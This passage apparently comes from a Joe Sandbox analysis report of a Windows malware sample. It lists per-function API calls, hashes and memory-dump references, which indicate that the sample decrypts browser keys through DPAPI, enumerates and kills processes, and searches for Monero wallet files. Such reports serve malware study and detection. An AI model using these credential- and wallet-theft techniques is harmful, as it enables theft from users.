                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 826d18b3cb3ea2d8bc91f9817a7a13febafb6426e174e5e5754aa170e66be3fd
                            • Instruction ID: 640e53371abbfbebf3551951b8a60307faced4bf986f183036f7ebb1593693f3
                            • Opcode Fuzzy Hash: 826d18b3cb3ea2d8bc91f9817a7a13febafb6426e174e5e5754aa170e66be3fd
                            • Instruction Fuzzy Hash: CE3150B6D10608ABCF04DBA5DC45AEFB7B8BB58310F044518E941A3281E735EE05DBA2
                            APIs
                            • memset.MSVCRT ref: 00F4967B
                              • Part of subcall function 00F48EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00F496AE,00000000), ref: 00F48EEB
                              • Part of subcall function 00F48EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00F48EF2
                              • Part of subcall function 00F48EE0: wsprintfW.USER32 ref: 00F48F08
                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00F4973B
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F49759
                            • CloseHandle.KERNEL32(00000000), ref: 00F49766
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID:
                            • API String ID: 3729781310-0
                            • Opcode ID: f2ac798336997b6e3250789a96b24ec672c6024f2cf8852e590fe79da767e60e
                            • Instruction ID: f9e0ef7cd2cbb5085ca56224a17ebc03c873aa834c381ee121263c369d521717
                            • Opcode Fuzzy Hash: f2ac798336997b6e3250789a96b24ec672c6024f2cf8852e590fe79da767e60e
                            • Instruction Fuzzy Hash: 98314A75E002089FDB14DFE0DD49BEEB779BB44700F104558FA06AB289DBB86A48DB51
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00F505BF), ref: 00F4885A
                            • Process32First.KERNEL32(?,00000128), ref: 00F4886E
                            • Process32Next.KERNEL32(?,00000128), ref: 00F48883
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • CloseHandle.KERNEL32(?), ref: 00F488F1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 17296f79ba8b035e9de222c770dda0d07c3c7140047c6d1b494509dd042da1b1
                            • Instruction ID: 34550017924485f61a90a237f4ad33f0412f161dd4268432b51d5b159f8f0ba4
                            • Opcode Fuzzy Hash: 17296f79ba8b035e9de222c770dda0d07c3c7140047c6d1b494509dd042da1b1
                            • Instruction Fuzzy Hash: 99319C71941618EBDB25EF90DC95FEEBB78FB44740F004299F90AA2190DF346A44DFA1
                            APIs
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FAFE13
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FAFE2C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value___vcrt_
                            • String ID:
                            • API String ID: 1426506684-0
                            • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                            • Instruction ID: 6c68a5e1e016db4ff4b04184bb73e275a09df6399a6831355db0ea466fe1920c
                            • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                            • Instruction Fuzzy Hash: C6012472609721EEF63427B59CC9AAB36A4FB023F07304339F112881F2EF554C45B540
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F50DE8,00000000,?), ref: 00F47B40
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F47B47
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00F50DE8,00000000,?), ref: 00F47B54
                            • wsprintfA.USER32 ref: 00F47B83
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 30de8149dab3fab2fc79cdf790ead756d84b7266edd25607010ed358e28e3844
                            • Instruction ID: e0aa41bd93ba977038fcd2b0af60336e1da747db10f07b680b6bcd538cd9bfd3
                            • Opcode Fuzzy Hash: 30de8149dab3fab2fc79cdf790ead756d84b7266edd25607010ed358e28e3844
                            • Instruction Fuzzy Hash: 3F1130B2904118ABCB14DFC9ED49BBEB7B8FB4CB11F10421AF645A2284D3395940D7B0
                            APIs
                            • CreateFileA.KERNEL32(00F43D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00F43D3E,?), ref: 00F4948C
                            • GetFileSizeEx.KERNEL32(000000FF,00F43D3E), ref: 00F494A9
                            • CloseHandle.KERNEL32(000000FF), ref: 00F494B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID:
                            • API String ID: 1378416451-0
                            • Opcode ID: a1c6d6c303bb5d20db524760eb3d4cf8a3f695bd12a8ceabcdd59d0bf930a5c6
                            • Instruction ID: 15a48b9934a0a3064edae5da1e20cee32ae81094846209ba6ec1150adcadac0e
                            • Opcode Fuzzy Hash: a1c6d6c303bb5d20db524760eb3d4cf8a3f695bd12a8ceabcdd59d0bf930a5c6
                            • Instruction Fuzzy Hash: EBF03139F04208BBDB20DBB0EC49F5FBBBAAB48710F10C654FA51A71C4D674A6019B80
                            APIs
                            • __getptd.LIBCMT ref: 00F4CA7E
                              • Part of subcall function 00F4C2A0: __amsg_exit.LIBCMT ref: 00F4C2B0
                            • __getptd.LIBCMT ref: 00F4CA95
                            • __amsg_exit.LIBCMT ref: 00F4CAA3
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00F4CAC7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 7c26677111dddfa81d07090a216268f0393193327dbe548f7bd22822b9216405
                            • Instruction ID: 53722882ff7adf6731081293481c7f481c1e20e79fb014f4364d7a71c0df8963
                            • Opcode Fuzzy Hash: 7c26677111dddfa81d07090a216268f0393193327dbe548f7bd22822b9216405
                            • Instruction Fuzzy Hash: C7F062329463189BD7A1FBA85C0675E3EA0AF00721F101149EE05971D3DBAC9940B6D5
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Catch
                            • String ID: MOC$RCC
                            • API String ID: 78271584-2084237596
                            • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                            • Instruction ID: e6f509e4436711384a6b64923d9c9e43d0b4844e3f098a99cd0453cd477c5aa4
                            • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                            • Instruction Fuzzy Hash: E64159B2D00209AFCF26DF99DD81AEEBBB5BF48314F188099F90566211DB359990EF50
                            APIs
                              • Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F48F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00F451CA
                            • lstrcat.KERNEL32(?,00F51058), ref: 00F451E7
                            • lstrcat.KERNEL32(?,00988870), ref: 00F451FB
                            • lstrcat.KERNEL32(?,00F5105C), ref: 00F4520D
                              • Part of subcall function 00F44B60: wsprintfA.USER32 ref: 00F44B7C
                              • Part of subcall function 00F44B60: FindFirstFileA.KERNEL32(?,?), ref: 00F44B93
                              • Part of subcall function 00F44B60: StrCmpCA.SHLWAPI(?,00F50FC4), ref: 00F44BC1
                              • Part of subcall function 00F44B60: StrCmpCA.SHLWAPI(?,00F50FC8), ref: 00F44BD7
                              • Part of subcall function 00F44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00F44DCD
                              • Part of subcall function 00F44B60: FindClose.KERNEL32(000000FF), ref: 00F44DE2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: c00519842d57495bd92641d922a12d104505535bd7d72a33087bc56eb42c3fb2
                            • Instruction ID: 1c9f8f834b18811d8986895dca5536dac6a0ad4b6f4c6c8271f768ed47f7fbfe
                            • Opcode Fuzzy Hash: c00519842d57495bd92641d922a12d104505535bd7d72a33087bc56eb42c3fb2
                            • Instruction Fuzzy Hash: C521F276900208AFD725F770FC4AEED373CAB94300F004654BA5656186DE78A6CCDB51